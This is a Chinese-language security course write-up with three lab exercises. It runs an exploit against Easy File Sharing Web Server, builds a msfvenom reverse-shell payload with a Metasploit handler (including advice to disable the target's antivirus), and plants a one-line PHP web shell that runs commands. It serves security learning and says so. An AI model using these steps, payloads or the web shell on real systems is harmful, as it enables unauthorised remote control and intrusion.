远程控制课程内容
一、Easy File Sharing Web Server 存在远程溢出
二、Kali中生成被控端
三、在网站中写入一句话木马
一、Easy File Sharing Web Server 存在远程溢出
复现步骤
打开Easy File Sharing Web Server,并开启端口为8000的网站
打开kali扫描对应ip地址
可以看见8000端口开放了Easy File Sharing Web Server http 6.9
说明目标主机已经运行了Easy File Sharing Web Server这个软件
接下来我们用searchsploit查Easy File Sharing
他能给出我们要用那些路径下的那些脚本
这里我们的Easy File Sharing Web Server是7.2版本的,所有我们用对应的脚本39009.py
他会打开目标主机的计算器
这样就完成了
二、Kali中生成被控端
复现步骤
打开kali,用msfvenom生成一个payload.exe
注意这里的被控端是windows系统,如果是安卓系统填android
lhost填你自己的kali的ip地址,lport填一个没被占用的端口就行
最后面的“/home/kali/payload.exe”是payload.exe文件生成时保存的路径,填一个你能找到的路径就好,最好不要放在“/root”路径下,有可能payload文件会取不出来
把生成的payload.exe发给被控端备用
被控端要把杀毒软件关闭,电脑自带的也要关闭
接着打开msfconsole界面
以此输入:
use exploit/multi/handler
set payload generic/shell_reverse_tcp
set lhost 192.168.79.134(输入你自己的IP地址)
set lport 7777(输入你的端口)
注意lhost和lport要和刚刚生成payload文件时的一致
最后输入exploit开始监听
现在被控端打开payload.exe
我们可以看看被控端的磁盘信息
这样就成功了
请不要乱输代码,否则被控端的信息可能会被损坏
输入exit退出
三、在网站中写入一句话木马
复现步骤
右键创建一个新文档,命名为shell.php
打开shell.php,写入一句话木马
<?php system($_REQUEST['cmd']);?>
保存后把shell.php放入“/var/www/html”路径下
开启apache
service apache2 start
现在可以去浏览器验证是否成功了
输入http://192.168.134/shell.php?cmd=ifconfig(IP地址是开启apache的主机的)
可以看到网页成功运行了ifconfig
本文仅用于网络安全学习,严禁用于非法攻击,违规使用后果自负。